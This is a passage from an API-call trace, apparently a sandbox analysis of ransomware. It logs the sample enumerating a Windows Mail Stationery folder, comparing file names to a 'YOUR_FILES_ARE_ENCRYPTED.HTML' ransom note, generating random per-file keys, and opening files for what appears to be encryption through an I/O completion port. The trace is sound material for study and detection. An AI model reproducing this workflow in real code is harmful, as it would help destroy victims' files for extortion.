returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" [0170.726] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*" [0170.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.728] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.728] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e4d104, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0170.728] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0170.728] lstrcmpW (lpString1="Bears.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.728] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0170.729] lstrlenW (lpString=".htm") returned 4 [0170.729] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0170.729] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0170.729] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=255) returned 1 [0170.729] CloseHandle (hObject=0x5cc) returned 1 [0170.729] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8267651c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0170.729] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0170.729] lstrcmpW (lpString1="Bears.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.729] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0170.729] lstrlenW (lpString=".jpg") returned 4 [0170.729] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0170.729] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0170.730] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1074) returned 1 [0170.730] GetProcessHeap () returned 0x270000 [0170.730] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78e9160 [0170.732] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="5A") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="2C") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="33") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="12") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="D1") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="47") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="DE") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="AF") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A9") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="11") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="11") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A6") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A2") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="9C") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="93") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="FD") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="69") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="B8") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="3F") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="D6") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="BC") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="DB") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="66") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="BA") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="DF") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="85") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="09") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="54") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="01") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="8B") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="87") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="2B") returned 2 [0170.733] lstrcpyW (in: lpString1=0x78f9214, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" [0170.734] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x78e9160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.734] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78e9160, lpOverlapped=0x78e9160) returned 1 [0170.734] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe21ca9ab, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0170.734] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0170.734] lstrcmpW (lpString1="Desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.734] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0170.734] lstrlenW (lpString=".ini") returned 4 [0170.734] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0170.734] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e73264, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0170.734] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0170.734] lstrcmpW (lpString1="Garden.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.734] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0170.734] lstrlenW (lpString=".htm") returned 4 [0170.734] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0170.734] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0170.734] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=231) returned 1 [0170.734] CloseHandle (hObject=0x590) returned 1 [0170.735] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82780ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0170.735] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0170.735] lstrcmpW (lpString1="Garden.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.735] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0170.735] lstrlenW (lpString=".jpg") returned 4 [0170.735] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0170.735] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0170.735] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=23871) returned 1 [0170.735] GetProcessHeap () returned 0x270000 [0170.735] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0170.740] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="F3") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="61") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="2B") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F0") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="53") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="69") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="58") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="04") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="50") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="1D") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="EF") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="8F") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D4") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="8C") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="F1") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="5A") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="C7") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="59") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B6") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="1F") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="E0") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="F7") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="FC") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="33") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="8A") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7A") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="1C") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="FA") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="C7") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="E0") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="81") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="34") returned 2 [0170.742] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" [0170.742] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.742] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0170.742] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ebf524, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Green Bubbles.htm", cAlternateFileName="GREENB~1.HTM")) returned 1 [0170.742] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0170.742] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.742] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0170.742] lstrlenW (lpString=".htm") returned 4 [0170.742] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0170.742] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0170.742] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0170.742] CloseHandle (hObject=0x5dc) returned 1 [0170.743] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827cd17c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x0, dwReserved1=0x0, cFileName="GreenBubbles.jpg", cAlternateFileName="GREENB~1.JPG")) returned 1 [0170.743] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0170.743] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.743] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0170.743] lstrlenW (lpString=".jpg") returned 4 [0170.743] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0170.743] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0170.743] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6406) returned 1 [0170.743] GetProcessHeap () returned 0x270000 [0170.743] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0170.745] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="5C") returned 2 [0170.745] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="F1") returned 2 [0170.745] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="05") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="3D") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="65") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="E2") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="C3") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="24") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="6F") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="D0") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="90") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="6D") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="B1") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="8C") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="4C") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="56") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="DB") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="19") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="56") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="37") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="59") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EC") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="07") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="FE") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CF") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="98") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="40") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="E6") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="25") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DB") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="83") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="5A") returned 2 [0170.747] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" [0170.747] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.747] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0170.747] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f0b7e4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hand Prints.htm", cAlternateFileName="HANDPR~1.HTM")) returned 1 [0170.747] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0170.747] lstrcmpW (lpString1="Hand Prints.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.747] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0170.747] lstrlenW (lpString=".htm") returned 4 [0170.747] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0170.748] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0170.748] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=235) returned 1 [0170.748] CloseHandle (hObject=0x594) returned 1 [0170.748] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827f32dc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x0, dwReserved1=0x0, 